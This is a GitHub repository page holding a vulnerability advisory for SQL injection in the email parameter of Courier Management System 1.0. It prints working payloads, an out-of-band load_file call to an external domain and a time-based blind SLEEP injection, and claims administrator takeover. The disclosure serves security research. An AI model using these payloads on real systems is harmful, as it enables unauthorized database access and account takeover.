Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/oretnom23/2022/Courier-Management-System/
CVE-nu11secur1ty/vendors/oretnom23/2022/Courier-Management-System/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
PoC
 
 
 
 
 
 

Courier Management System

Vendor

Description:

The email parameter from Courier Management System 1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\ipb60j3tyyqct2vn1oi9ox4it9z2ntix6o9c1zrng.nu11secur1tyPenetrationTestingEngineer.net\pcl'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can take administrator account control on this system. Status: CRITICAL

[+] Payloads:

---
Parameter: email (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=gEnNbsoi@burpcollaborator.net'+(select load_file('\\\\ipb60j3tyyqct2vn1oi9ox4it9z2ntix6o9c1zrng.nu11secur1tyPenetrationTestingEngineer.net\\pcl'))+'' AND (SELECT 2572 FROM (SELECT(SLEEP(3)))CpLw) AND 'MmOU'='MmOU&password=m1T!v9o!U7
---

Reproduce:

href

Proof and Exploit:

href